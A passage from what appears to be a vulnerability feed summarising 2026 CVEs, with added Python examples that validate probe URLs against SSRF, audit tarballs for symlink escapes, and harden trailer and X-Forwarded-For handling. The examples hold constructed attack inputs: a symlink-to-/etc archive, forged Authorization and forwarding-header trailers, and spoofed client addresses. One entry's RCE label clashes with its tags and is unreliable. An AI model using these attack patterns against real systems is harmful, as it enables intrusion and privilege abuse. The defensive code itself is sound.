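    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4",
    "::1/128", "fc00::/7", "fe80::/10",
)]
ALLOWED_SCHEMES = {"rtsp", "rtsps", "http", "https"}   # what a camera probe legitimately needs


def is_blocked(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    if ip.version == 6 and ip.ipv4_mapped is not None:   # ::ffff:127.0.0.1 is still loopback
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETS)


def validate_probe_url(url: str, resolve) -> list:
    """Return the pinned list of IPs the probe may connect to, or raise ValueError.

    `resolve(host) -> [ip, ...]` is injected so the check runs offline; in production pass a
    getaddrinfo wrapper and then connect to the returned IPs rather than re-resolving the
    name (otherwise a DNS rebinding answer can swap in an internal address between the check
    and the connect).
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    try:
        candidates = [str(ipaddress.ip_address(host))]      # literal IP, v4 or v6
    except ValueError:
        candidates = resolve(host)                          # hostname: check every answer
    if not candidates:
        raise ValueError(f"unresolvable host: {host!r}")
    for ip in candidates:
        if is_blocked(ip):
            raise ValueError(f"{host!r} resolves to blocked address {ip}")
    return candidates


# Constructed resolver standing in for DNS in this example.
FAKE_DNS = {
    "camera.example.net": ["203.0.113.10"],
    "rebind.example.net": ["203.0.113.10", "10.0.0.5"],   # one public, one internal answer
}


def fake_resolve(host: str) -> list:
    return FAKE_DNS.get(host, [])
```

Note that a hostname with one public and one internal answer is rejected outright: accepting the public answer and letting the connect routine pick whichever address it likes is exactly the gap rebinding attacks use.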
-
CVE-2026-33071
MEDIUM
CVSS 4.3
FileRise, a self-hosted web file manager and WebDAV server, contains an unrestricted file upload vulnerability in its WebDAV endpoint that bypasses filename validation controls present in the regular upload path, allowing authenticated attackers to upload executable file types such as .phtml, .php5, and .htaccess. In non-default Apache configurations lacking LocationMatch protection, this enables remote code execution on the underlying web server. The vulnerability affects FileRise versions prior to 3.8.0 and has been patched; no public exploit code or active KEV listing is currently confirmed, but the presence of a GitHub security advisory indicates vendor acknowledgment of the threat.
PHP
RCE
Apache
File Upload
-
CVE-2026-33061
MEDIUM
CVSS 5.8
Jexactyl, a game management panel and billing system, contains a stored DOM-based cross-site scripting (XSS) vulnerability in its template rendering engine where server-side objects are injected into client-side JavaScript without proper escaping. The vulnerability affects versions after commit 025e8dbb0daaa04054276bda814d922cf4af58da and before the patched commit e28edb204e80efab628d1241198ea4f079779cfd, allowing authenticated attackers with high privileges to inject malicious payloads through attacker-controlled fields such as usernames or display names that execute arbitrary JavaScript in the browsers of all users viewing the affected page. The CVSS score of 5.8 reflects the high privilege prerequisite, though the stored nature of the XSS and the absence of any user interaction beyond viewing the page make it a meaningful risk for multi-user deployments.
XSS
PHP
-
CVE-2026-33056
MEDIUM
CVSS 6.5
The tar-rs library versions 0.4.44 and below contain a symlink-following vulnerability in the unpack_dir function that allows attackers to modify permissions on arbitrary directories outside the extraction root. An attacker can craft a malicious tarball containing a symlink entry followed by a directory entry with the same name; when unpacked, the library follows the symlink and applies chmod to the target directory rather than validating that it resides within the extraction root. The flaw is network-accessible with low attack complexity and exploitable by remote attackers without privileges, the only user interaction being the victim unpacking a crafted archive.
Path Traversal
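Added example, not tar-rs code: a Python audit of a tar stream that reproduces the advisory's symlink-then-directory pattern in a constructed archive and flags it, alongside a constructed benign archive that passes. The rule it enforces is the one the vulnerable `unpack_dir` lacked: once an archive path has been written as a symlink, no later entry may be resolved through it, and no symlink may point outside the extraction root.

```python
import io
import posixpath
import tarfile


def _norm(name: str) -> str:
    """Collapse '.', '//' and a leading '/' so prefix comparisons are meaningful."""
    return posixpath.normpath("/" + name).lstrip("/")


def audit_tar(data: bytes) -> list:
    """Return [(member_name, reason)] for every entry a safe extractor must refuse."""
    findings = []
    symlinks = {}   # normalized archive path -> link target, in order of appearance
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf:
            name = _norm(m.name)
            parts = name.split("/")
            if ".." in parts:
                findings.append((m.name, "path traversal component"))
                continue
            # Any prefix of this path (including the full path) already created as a symlink
            # means mkdir/chmod/open would act on the link target, not inside the root.
            prefixes = ("/".join(parts[:i]) for i in range(1, len(parts) + 1))
            hit = next((p for p in prefixes if p in symlinks), None)
            if hit is not None:
                findings.append((m.name, f"resolves through earlier symlink {hit!r} -> {symlinks[hit]!r}"))
                continue
            if m.issym():
                target = posixpath.normpath(posixpath.join(posixpath.dirname(name), m.linkname))
                if m.linkname.startswith("/") or target == ".." or target.startswith("../"):
                    findings.append((m.name, f"symlink escapes extraction root: {m.linkname!r}"))
                symlinks[name] = m.linkname
    return findings


def build_malicious_tar() -> bytes:
    """Constructed archive reproducing the symlink-then-directory pattern from the advisory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        link = tarfile.TarInfo("evil")
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc"          # points outside the extraction root
        tf.addfile(link)
        d = tarfile.TarInfo("evil")     # same name, now a directory with mode 0777
        d.type = tarfile.DIRTYPE
        d.mode = 0o777
        tf.addfile(d)
    return buf.getvalue()


def build_benign_tar() -> bytes:
    """Constructed archive with a directory, a file and a relative in-tree symlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        d = tarfile.TarInfo("docs")
        d.type = tarfile.DIRTYPE
        d.mode = 0o755
        tf.addfile(d)
        payload = b"hello\n"
        f = tarfile.TarInfo("docs/readme.txt")
        f.size = len(payload)
        tf.addfile(f, io.BytesIO(payload))
        link = tarfile.TarInfo("README")
        link.type = tarfile.SYMTYPE
        link.linkname = "docs/readme.txt"
        tf.addfile(link)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in audit_tar(build_malicious_tar()):
        print(f"REJECT {name}: {reason}")
```

Python 3.12's `tarfile` `data` filter (PEP 706) rejects the same pattern at extraction time; the audit above is for the case where an archive has to be vetted before it reaches an extractor you do not control.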
-
CVE-2026-32986
MEDIUM
CVSS 6.1
A second-order XSS vulnerability exists in Textpattern CMS version 4.9.0 where user-supplied input (such as category parameters) is improperly sanitized and lacks contextual XML escaping in Atom feed XML elements like <id> and <link href>. While the payload does not execute directly in raw XML contexts within modern browsers, it becomes exploitable when feed readers, admin dashboards, or CMS aggregators consume the feed and insert its content into the DOM using unsafe methods like innerHTML, resulting in arbitrary JavaScript execution in a trusted context. A public proof-of-concept exploit is available, making this an active threat to administrators and users consuming feeds from vulnerable Textpattern instances.
XSS
-
CVE-2026-32935
MEDIUM
CVSS 5.9
phpseclib versions 1.0.26 and below, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a padding oracle timing attack when using AES in CBC mode, allowing attackers to decrypt sensitive data through cryptanalysis of response timing differences. This information disclosure vulnerability affects any PHP application using the vulnerable phpseclib library for AES-CBC encryption. Although no EPSS data or confirmed active exploitation (KEV status) is currently available, the verified fix and security advisory indicate a legitimate cryptographic weakness requiring attention.
PHP
Information Disclosure
-
CVE-2026-32889
MEDIUM
CVSS 6.5
A non-terminating loop denial-of-service vulnerability exists in tinytag version 2.2.0, a Python library for reading audio file metadata. An attacker can supply a malicious MP3 file containing a crafted ID3v2 SYLT (synchronized lyrics) frame that causes the parsing operation to enter an infinite loop, consuming CPU resources until the worker process is terminated. The vulnerability affects server-side deployments that automatically parse user-supplied files, and has been patched in version 2.2.1.
Python
Denial Of Service
-
CVE-2026-32881
MEDIUM
CVSS 5.3
ewe, a Gleam web server, contains an authentication bypass vulnerability in versions 0.6.0 through 3.0.4 that exploits improper handling of chunked transfer encoding trailer headers. An unauthenticated remote attacker can declare sensitive HTTP headers in the Trailer field and append them after the final chunk to overwrite legitimate values set by reverse proxies, enabling them to forge authentication credentials, hijack sessions, bypass rate limiting, or spoof proxy-trust headers. The vulnerability has been patched in version 3.0.5, and while not currently listed in CISA's KEV catalog, the CVSS score of 5.3 reflects medium severity with integrity impact.
Authentication Bypass
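Added example, not ewe's code: a Python chunked-body decoder run over a constructed request fragment, with the merge step done both ways. `merge_vulnerable` folds trailers into the header map so attacker-supplied trailers overwrite what the reverse proxy set; `merge_hardened` leaves the headers untouched, drops the framing, auth and proxy-trust fields RFC 7230 forbids in trailers, and returns only trailers the request declared, kept separate from the headers. Header names and values are constructed.

```python
# Constructed request: headers as set by a front proxy, then a chunked body whose trailer
# section re-declares two of them.
PROXY_HEADERS = {
    "host": "app.internal",
    "x-forwarded-for": "203.0.113.7",
    "x-forwarded-proto": "https",
    "authorization": "Bearer legit-user-token",
    "trailer": "X-Checksum",
}
CHUNKED_BODY = (
    b"5\r\nhello\r\n"
    b"0\r\n"
    b"X-Forwarded-For: 127.0.0.1\r\n"
    b"Authorization: Bearer attacker-token\r\n"
    b"X-Checksum: 2cf24dba\r\n"
    b"\r\n"
)

# Fields RFC 7230 section 4.1.2 says must not be sent in trailers and must not be acted on
# when received there: message framing, routing, authentication and proxy-trust headers.
FORBIDDEN_TRAILERS = {
    "authorization", "cookie", "host", "content-length", "transfer-encoding",
    "proxy-authorization", "x-forwarded-for", "x-forwarded-proto", "x-real-ip",
}


def parse_chunked(raw: bytes):
    """Decode a chunked body; return (body, trailers) with trailer names lower-cased."""
    body = bytearray()
    trailers = {}
    pos = 0
    while True:
        nl = raw.index(b"\r\n", pos)
        size = int(raw[pos:nl].split(b";")[0], 16)   # ignore chunk extensions
        pos = nl + 2
        if size == 0:
            break
        body += raw[pos:pos + size]
        pos += size + 2                               # skip chunk data and its CRLF
    while True:                                       # trailer section up to the blank line
        nl = raw.index(b"\r\n", pos)
        line, pos = raw[pos:nl], nl + 2
        if not line:
            break
        name, _, value = line.partition(b":")
        trailers[name.strip().lower().decode()] = value.strip().decode()
    return bytes(body), trailers


def merge_vulnerable(headers: dict, trailers: dict) -> dict:
    """The behaviour described in the advisory: trailers are folded into the headers and win."""
    merged = dict(headers)
    merged.update(trailers)
    return merged


def merge_hardened(headers: dict, trailers: dict):
    """Headers stay immutable; only declared, non-sensitive trailers are kept, and kept apart."""
    declared = {h.strip().lower() for h in headers.get("trailer", "").split(",") if h.strip()}
    accepted = {}
    for name, value in trailers.items():
        if name in FORBIDDEN_TRAILERS or name not in declared:
            continue                                  # ignored, never merged into headers
        accepted[name] = value
    return dict(headers), accepted


if __name__ == "__main__":
    body, trailers = parse_chunked(CHUNKED_BODY)
    print(merge_vulnerable(PROXY_HEADERS, trailers)["authorization"])
    print(merge_hardened(PROXY_HEADERS, trailers)[0]["authorization"])
```

Whether the application or the proxy does this merge, the invariant is the same: anything the proxy asserts about the client (source address, scheme, identity) must be set after the full message, trailers included, has been parsed, or the trailer section is simply discarded.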
-
CVE-2026-32880
MEDIUM
CVSS 6.4
ChurchCRM versions prior to 7.0.2 contain a stored cross-site scripting (XSS) vulnerability in the system settings module where administrative users can inject unescaped JavaScript payloads into JSON-type system settings fields. Any administrator who subsequently views the system settings page will execute the attacker's malicious script, potentially allowing credential theft, session hijacking, or lateral movement within the church organization's administrative infrastructure. The vulnerability has been patched in version 7.0.2, and no evidence of active exploitation in the wild has been reported, though the attack requires only high-level privileges (admin access) and basic user interaction (viewing settings).
PHP
XSS
-
CVE-2026-32844
MEDIUM
CVSS 6.1
A reflected cross-site scripting (XSS) vulnerability exists in XinLiangCoder's php_api_doc application through commit 1ce5bbf, specifically in the list_method.php file where the 'f' GET parameter is output directly to the page without sanitization. Remote attackers can inject arbitrary JavaScript code by crafting malicious URLs, enabling session hijacking, credential theft, and malware distribution within the application context. No EPSS data or KEV status is currently available, but the vulnerability is confirmed with a proof-of-concept reference available via the VulnCheck advisory.
XSS
PHP
-
CVE-2026-32810
MEDIUM
CVSS 5.5
Halloy, an IRC application written in Rust, fails to properly restrict file permissions on its configuration directory and files on *nix and macOS systems prior to commit f180e41061db393acf65bc99f5c5e7397586d9cb, resulting in world-readable access to plaintext credentials. Any local user on an affected system can read sensitive authentication data stored in config.toml or referenced password files, leading to credential compromise. While no EPSS data is currently available, the vulnerability represents a direct information disclosure risk with low exploitation complexity.
Information Disclosure
Apple
macOS
-
CVE-2026-32733
MEDIUM
CVSS 6.5
Halloy, a Rust-based IRC application, contains a path traversal vulnerability in its DCC (Direct Client-to-Client) receive functionality that fails to sanitize filenames from incoming DCC SEND requests prior to commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6. Remote IRC users can exploit this vulnerability to write files outside the configured save directory using path traversal sequences like ../../.ssh/authorized_keys, potentially allowing arbitrary file placement on the victim's system with zero user interaction if auto-accept is enabled. The vulnerability has been patched and is tracked under CWE-22 (Improper Limitation of a Pathname to a Restricted Directory).
Path Traversal
-
CVE-2026-32697
MEDIUM
CVSS 6.5
SuiteCRM versions prior to 8.9.3 contain an access control bypass in the RecordHandler::getRecord() method that allows authenticated users to retrieve any record from the system without proper ACL view permission checks. An attacker with valid credentials can enumerate and read sensitive customer data, financial records, or other confidential information across all modules by directly calling the vulnerable method. The vulnerability has a CVSS score of 6.5 (medium-high) and is information disclosure in nature with no active exploitation reports or public proof-of-concept available at this time.
Authentication Bypass
-
CVE-2026-32310
MEDIUM
CVSS 4.1
Cryptomator versions 1.6.0 through 1.19.0 contain a path traversal vulnerability in vault configuration parsing where the masterkeyfile loader resolves an unverified keyId parameter as a filesystem path before integrity checks are performed. An attacker with the ability to supply a malicious vault configuration can exploit this to trigger arbitrary file existence checks, including UNC paths on Windows that can initiate outbound SMB connections before the user even enters a passphrase, potentially leading to information disclosure about local file structure and network exposure. The vulnerability has been patched in version 1.19.1, and while no active KEV exploitation has been reported, the low attack complexity and the ability to chain this with social engineering (malicious vault sharing) makes it a moderate practical risk.
Microsoft
Path Traversal
Windows
-
CVE-2026-32305
MEDIUM
CVSS 5.3
Traefik reverse proxy and load balancer contains an mTLS authentication bypass vulnerability that allows attackers to circumvent mutual TLS certificate requirements by sending fragmented TLS ClientHello packets. Affected versions include Traefik 2.11.40 and below, 3.0.0-beta1 through 3.6.10, and 3.7.0-ea.1. When ClientHello messages are fragmented across multiple TLS records, SNI extraction fails with an EOF error, causing the TCP router to fall back to default TLS configuration without client certificate validation, enabling unauthorized access to services that should require mTLS authentication.
Authentication Bypass
-
CVE-2026-32114
MEDIUM
CVSS 4.3
An Insecure Direct Object Reference (IDOR) vulnerability in Discourse allows any authenticated user to access restricted metadata about AI personas, features, and LLM models by directly referencing their identifiers, exposing sensitive information including credit allocations and usage statistics. The vulnerability affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, and requires only low-privilege access (any logged-in user account) over the network. While the CVSS 4.3 rating reflects low confidentiality impact with no integrity or availability impact, this represents a clear information disclosure risk that could enable unauthorized tracking of AI resource consumption and usage patterns.
Authentication Bypass
-
CVE-2026-31926
MEDIUM
CVSS 6.5
A web-based mapping platform exposes charging station authentication identifiers publicly, allowing unauthenticated network-based attackers to access sensitive credential information without any user interaction required. The vulnerability affects IGL Technologies eparking.fi application and enables attackers to obtain authentication material that could be leveraged for unauthorized access to charging infrastructure. There is no indication of active exploitation in the wild or public proof-of-concept code, but the vulnerability represents a direct exposure of authentication secrets (CWE-522) with moderate real-world impact.
Information Disclosure
-
CVE-2026-31869
MEDIUM
CVSS 4.3
Discourse prior to versions 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contains an information disclosure vulnerability in the ComposerController#mentions endpoint that reveals hidden group membership to any authenticated user capable of messaging the group. An attacker can exploit this by supplying hidden-membership group names and probing arbitrary usernames to infer membership based on whether the user_reasons field returns 'private', effectively bypassing the group member-visibility controls designed to protect sensitive group information. This vulnerability is not known to be actively exploited in the wild (KEV status unknown), carries a CVSS 4.3 rating reflecting low confidentiality impact with low attack complexity, and requires prior authentication.
Information Disclosure
-
CVE-2026-31805
MEDIUM
CVSS 5.3
A remote code execution vulnerability in Discourse (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2026-31382
MEDIUM
CVSS 6.1
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the error_description parameter of Gainsight Assist, allowing unauthenticated attackers to inject malicious JavaScript payloads that execute in victims' browsers. The vulnerability is particularly dangerous because attackers can bypass the application's Web Application Firewall (WAF) using Safari-specific event handlers such as onpagereveal, which are not typically filtered by standard XSS protections. While the CVSS score of 6.1 indicates moderate severity with limited direct impact (low confidentiality and integrity impact, no availability impact), the attack requires minimal technical complexity and no special privileges, making it exploitable by any attacker who can craft a malicious URL and socially engineer a victim into clicking it.
XSS
Apple
Safari
-
CVE-2026-31381
MEDIUM
CVSS 5.3
Gainsight Assist contains an information disclosure vulnerability where user email addresses (PII) are exposed in base64-encoded format within the OAuth callback URL's state parameter. This affects all versions of Gainsight Assist and allows unauthenticated remote attackers to extract sensitive personal information with no user interaction required. The vulnerability has a CVSS score of 5.3 (moderate) with confirmed disclosure via Rapid7, and patch availability has been documented in vendor advisories.
Information Disclosure
-
CVE-2026-30891
MEDIUM
CVSS 6.5
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an authorization bypass vulnerability in the user actions endpoint that allows authenticated users to access other users' private activity data. An attacker with valid login credentials can enumerate and view private user actions without proper permission checks, resulting in information disclosure. This is a moderate-severity issue (CVSS 6.5) that requires authentication to exploit but has no known active exploitation or public proof-of-concept at this time.
Information Disclosure
-
CVE-2026-30889
MEDIUM
CVSS 4.9
A moderator authorization bypass vulnerability in Discourse allows authenticated moderators to access post metadata they should not have permission to view, due to insufficient authorization checks. The vulnerability affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, and patched versions are available. While the impact is moderate and the attack requires moderator privileges, it is a meaningful confidentiality risk in multi-tenant forum environments where metadata isolation between moderation scopes matters.
Authentication Bypass
-
CVE-2026-30580
MEDIUM
CVSS 4.3
File Thingie version 2.5.7 contains a directory traversal vulnerability in its 'create folder from URL' functionality that allows unauthenticated attackers to read arbitrary files from the target system. By supplying traversal sequences to the folder creation feature, an attacker escapes the intended application directory and reads files outside it. Proof-of-concept code is available in public repositories; no EPSS score is published, but the vulnerability enables direct unauthorized information disclosure.
Path Traversal
-
CVE-2026-30579
MEDIUM
CVSS 6.5
File Thingie version 2.5.7 contains a Stored Cross-Site Scripting (XSS) vulnerability in its file upload functionality: a crafted filename is rendered unescaped, so it can execute arbitrary JavaScript in users' browsers. An attacker able to upload files to a File Thingie instance can inject a payload through the filename, affecting any user who views the file list or file details. While no EPSS probability or KEV inclusion status is currently available, proof-of-concept code has been published on GitHub, so the vulnerability is publicly disclosed and likely exploitable.
XSS
-
CVE-2026-30578
MEDIUM
CVSS 6.5
File Thingie version 2.5.7 contains a Reflected Cross-Site Scripting (XSS) vulnerability in the 'dir' GET parameter that allows attackers to execute arbitrary JavaScript in users' browsers. An attacker crafts a URL carrying a JavaScript payload in the 'dir' parameter and tricks a user into opening it, which can lead to session hijacking, credential theft, or malware distribution. While no EPSS score is available, proof-of-concept code exists in public repositories, indicating the vulnerability is well documented and likely exploitable.
XSS
-
CVE-2026-29828
MEDIUM
CVSS 6.1
DooTask v1.6.27 contains a Cross-Site Scripting (XSS) vulnerability in the /manage/project/<id> endpoint via the projectDesc input field, allowing an attacker to inject JavaScript that executes in the context of other users' browsers. The advisory does not settle whether the payload is stored or reflected, or whether the attacker must be authenticated. Successful exploitation can steal session cookies, perform actions on behalf of victims, or redirect users to malicious sites. A proof of concept has been publicly disclosed on GitHub, increasing the likelihood of exploitation.
XSS
-
CVE-2026-29794
MEDIUM
CVSS 5.3
Vikunja API fails to validate the source of the client address it uses for rate-limiting unauthenticated endpoints: it trusts X-Forwarded-For or X-Real-IP headers supplied by the client, so an attacker can present a fresh address on every request and bypass the limit. This affects Vikunja API (pkg:go/code.vikunja.io_api) and enables unlimited brute-force attempts against the login endpoint and other unauthenticated routes. A functional proof of concept has been published demonstrating the bypass, and exploitation needs neither authentication nor user interaction.
Docker
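Added example, not Vikunja's code: a sliding-window limiter with the client-address function written the vulnerable way and the hardened way, and a simulation of one attacker rotating X-Forwarded-For values. The proxy address, the limit and the attacker addresses are constructed; the hardened rule assumes the reverse proxy appends the real peer to X-Forwarded-For, which is what well-behaved proxies do.

```python
from collections import defaultdict, deque

# Constructed deployment facts for the demo (not Vikunja's configuration):
TRUSTED_PROXIES = {"10.0.0.5"}   # the only host allowed to set forwarding headers
LIMIT, WINDOW = 5, 60.0          # at most 5 login attempts per client per minute


class RateLimiter:
    """Sliding-window counter keyed by whatever string the caller passes."""

    def __init__(self, limit=LIMIT, window=WINDOW):
        self.limit, self.window = limit, window
        self.hits = defaultdict(deque)

    def allow(self, key: str, now: float) -> bool:
        q = self.hits[key]
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def client_ip_naive(remote_addr: str, headers: dict) -> str:
    """Vulnerable: trusts X-Forwarded-For / X-Real-IP from any peer and takes the
    leftmost entry, which is exactly the part the client controls."""
    forwarded = headers.get("X-Forwarded-For") or headers.get("X-Real-IP")
    return forwarded.split(",")[0].strip() if forwarded else remote_addr


def client_ip_hardened(remote_addr: str, headers: dict) -> str:
    """Honour forwarding headers only when the TCP peer is a trusted proxy, and
    then use the entry that proxy appended (the rightmost one)."""
    if remote_addr not in TRUSTED_PROXIES:
        return remote_addr
    forwarded = headers.get("X-Forwarded-For")
    if forwarded:
        return forwarded.split(",")[-1].strip()
    return headers.get("X-Real-IP", remote_addr)


def simulate(client_ip_fn, attempts: int = 50, via_proxy: bool = False) -> int:
    """One attacker at 203.0.113.7 hammers the login route, putting a fresh fake
    address in X-Forwarded-For on every request. Returns how many attempts the
    limiter let through."""
    limiter = RateLimiter()
    allowed = 0
    for i in range(attempts):
        spoofed = f"198.51.100.{i % 256}"
        if via_proxy:
            # a well-behaved proxy appends the real peer after whatever the client sent
            remote, headers = "10.0.0.5", {"X-Forwarded-For": f"{spoofed}, 203.0.113.7"}
        else:
            remote, headers = "203.0.113.7", {"X-Forwarded-For": spoofed}
        if limiter.allow(client_ip_fn(remote, headers), now=1_000.0 + i * 0.1):
            allowed += 1
    return allowed
```

With the naive function every one of the 50 attempts gets through, whether or not a proxy sits in front; with the hardened one the limiter stops at 5 in both topologies, because the key is the address the trusted hop observed rather than the one the client typed.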
-
CVE-2026-29108
MEDIUM
CVSS 6.5
SuiteCRM prior to version 8.9.3 contains an authenticated information disclosure vulnerability in an API endpoint that allows any authenticated user to retrieve sensitive user data including password hashes, usernames, and MFA configurations of other users. This enables attackers with valid credentials to enumerate and potentially crack administrative user passwords, escalating privileges within the CRM system. The vulnerability requires authentication but no additional user interaction, making it a practical attack vector for insider threats or compromised low-privilege accounts.
Information Disclosure
-
CVE-2026-28204
MEDIUM
CVSS 6.5
Authentication identifiers for electric vehicle charging stations are publicly exposed through web-based mapping platforms, allowing unauthenticated network-based access to sensitive authentication data. The vulnerability affects CTEK ChargePortal and enables attackers to obtain charging station credentials without requiring any privileges or user interaction. This information disclosure can lead to unauthorized access to charging infrastructure and potential manipulation of charging sessions.
Information Disclosure
-
CVE-2026-25792
MEDIUM
CVSS 6.5
Greenshot versions 1.3.312 and earlier contain an untrusted executable search path vulnerability (CWE-426). When a user double-clicks the Greenshot tray icon to open the screenshot directory, the application launches explorer.exe by bare name rather than by absolute path, so the Windows search order is consulted and a malicious explorer.exe planted in a directory searched earlier (such as the application directory) runs in the user's context. The advisory rates the attack as local with high privileges required, yet it still yields code execution and privilege escalation. No patch was available at the time of publication, so users should treat the tray-icon action as unsafe until one ships.
RCE
Microsoft
Windows
-
CVE-2026-22902
MEDIUM
CVSS 5.7
Arbitrary command execution in QuNetSwitch can be achieved by local attackers with administrator privileges due to insufficient input validation in command processing. This vulnerability affects QuNetSwitch versions prior to 2.0.5.0906, allowing authenticated high-privilege users to bypass security controls and execute system commands. No patch is currently available for affected versions.
Command Injection
-
CVE-2026-22901
MEDIUM
CVSS 6.3
Command injection in QuNetSwitch allows authenticated remote attackers to execute arbitrary commands on affected systems with high impact to confidentiality and integrity. The vulnerability requires valid user credentials to exploit but poses significant risk to systems running versions prior to 2.0.5.0906. No patch is currently available for this CVSS 6.3 medium-severity issue.
Command Injection
-
CVE-2026-22900
MEDIUM
CVSS 6.8
QuNetSwitch contains hard-coded credentials that allow remote attackers to bypass authentication and gain unauthorized access to affected systems. This vulnerability affects QuNetSwitch versions prior to 2.0.5.0906, where credentials are embedded in the application code rather than properly managed through secure credential storage mechanisms. Remote attackers can exploit this weakness without requiring valid user credentials, leading to complete compromise of the network switch management interface.
Authentication Bypass
-
CVE-2026-22737
MEDIUM
CVSS 5.9
Spring Framework applications using Java scripting engines (JRuby, Jython) for template views in Spring MVC or Spring WebFlux can leak sensitive file contents from outside intended directories through path traversal. Affected versions include 7.0.0-7.0.5, 6.2.0-6.2.16, 6.1.0-6.1.25, and 5.3.0-5.3.46, with no patch currently available. An unauthenticated remote attacker can read arbitrary files on the system with confidentiality impact.
Java
Path Traversal
Redhat
-
CVE-2026-4507
MEDIUM
CVSS 6.3
SQL injection in Mindinventory MindSQL versions up to 0.2.1 allows authenticated remote attackers to execute arbitrary SQL commands through the ask_db function. Public exploit code exists for this vulnerability, and the vendor has not provided a patch or responded to disclosure attempts. Attackers with valid credentials can manipulate database queries to access, modify, or delete sensitive data.
SQLi
-
CVE-2026-4506
MEDIUM
CVSS 6.3
A code injection vulnerability exists in Mindinventory MindSQL up to version 0.2.1 that allows remote code execution through manipulation of the ask_db function in mindsql/core/mindsql_core.py. An authenticated attacker can exploit this vulnerability to execute arbitrary code on the affected system. A public proof-of-concept exploit is available, and the vendor has not responded to early disclosure attempts, increasing the likelihood of active exploitation.
Code Injection
RCE
-
CVE-2026-4505
MEDIUM
CVSS 6.3
An unrestricted file upload vulnerability exists in eosphoros-ai DB-GPT versions up to 0.7.5 within the module_plugin.refresh_plugins function of the FastAPI endpoint located at packages/dbgpt-serve/src/dbgpt_serve/agent/hub/controller.py. An authenticated attacker can remotely upload arbitrary files to the system, potentially achieving remote code execution or system compromise. A public proof-of-concept exploit is available on GitHub, and the vendor has not responded to early disclosure attempts, indicating patches may not be forthcoming.
File Upload
-
CVE-2026-4500
MEDIUM
CVSS 6.3
A code injection vulnerability exists in bagofwords (versions up to 0.0.297) within the generate_df function of backend/app/ai/code_execution/code_execution.py, allowing remote attackers with low privileges to inject and execute arbitrary code. The vulnerability (CWE-74: Improper Neutralization of Special Elements in Output) has a CVSS score of 6.3 (Medium) with network-based attack vector and low attack complexity, meaning exploitation requires only basic authentication and no user interaction. A public proof-of-concept exploit is already available, making this a practical threat requiring prompt remediation.
Code Injection
-
CVE-2026-4499
MEDIUM
CVSS 6.9
An OS command injection vulnerability exists in the D-Link DIR-820LW router firmware version 2.03, specifically in the ssdpcgi_main function of the SSDP component. The vulnerability allows remote, unauthenticated attackers to execute arbitrary operating system commands via manipulation of the HTTP_ST environment variable. A proof-of-concept exploit has been publicly disclosed on GitHub, making this an immediate concern for organizations using affected devices.
Command Injection
D-Link
-
CVE-2026-4497
MEDIUM
CVSS 6.9
An OS command injection vulnerability exists in Totolink WA300 router firmware version 5.2cu.7112_B20190227, specifically in the recvUpgradeNewFw function within /cgi-bin/cstecgi.cgi. An unauthenticated remote attacker can exploit this flaw to execute arbitrary operating system commands on the affected device. A public proof-of-concept exploit has been released on GitHub, significantly lowering the barrier to exploitation and increasing real-world risk.
Command Injection
-
CVE-2026-4496
MEDIUM
CVSS 5.3
Local command injection in sigmade Git-MCP-Server's merge diff functions allows authenticated local attackers to execute arbitrary OS commands through unsanitized input passed to child_process.exec in src/gitUtils.ts. Public exploit code exists for this vulnerability, increasing the risk of active abuse. A patch is reported as available and should be applied promptly; the vendor did not respond to early disclosure notifications.
Command Injection
-
CVE-2026-4485
MEDIUM
CVSS 6.3
SQL injection in the College Management System 1.0 admin search_student.php endpoint allows authenticated attackers to manipulate the Search parameter and execute arbitrary database queries remotely. Public exploit code exists for this vulnerability, enabling attackers with valid credentials to potentially extract, modify, or delete sensitive student data. The vulnerability affects PHP-based installations and currently lacks an available patch.
PHP
SQLi
-
CVE-2026-4476
MEDIUM
CVSS 6.3
The YI Home Camera 2 (version 2.1.1_20171024151200) CGI endpoint fails to properly authenticate requests to the /home/web/ipc function, allowing unauthenticated attackers on the local network to manipulate camera settings and access sensitive functionality. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early notification. An attacker with network access to the camera could read configuration data, modify settings, or disrupt normal operations.
Authentication Bypass
-
CVE-2026-4473
MEDIUM
CVSS 4.7
SQL injection in itsourcecode Online Doctor Appointment System 1.0 allows remote attackers with high privileges to manipulate the appointment_id parameter in /admin/appointment_action.php, potentially compromising data confidentiality and integrity. Public exploit code exists for this vulnerability, though no patch is currently available for PHP-based deployments.
PHP
SQLi
-
CVE-2026-4472
MEDIUM
CVSS 6.3
SQL injection in itsourcecode Online Frozen Foods Ordering System 1.0 allows authenticated remote attackers to manipulate the Supplier_Name parameter in /admin/admin_edit_supplier.php, potentially enabling data exfiltration or modification. Public exploit code exists for this vulnerability, and no patch is currently available.
SQLi
PHP
-
CVE-2026-4471
MEDIUM
CVSS 4.7
SQL injection in itsourcecode Online Frozen Foods Ordering System 1.0 allows authenticated administrators to manipulate the First_Name parameter in /admin/admin_edit_employee.php, enabling remote database compromise. Public exploit code exists for this vulnerability, which requires high-level privileges but carries low complexity for exploitation. The affected system currently lacks an available patch.
PHP
SQLi
-
CVE-2026-4470
MEDIUM
CVSS 4.7
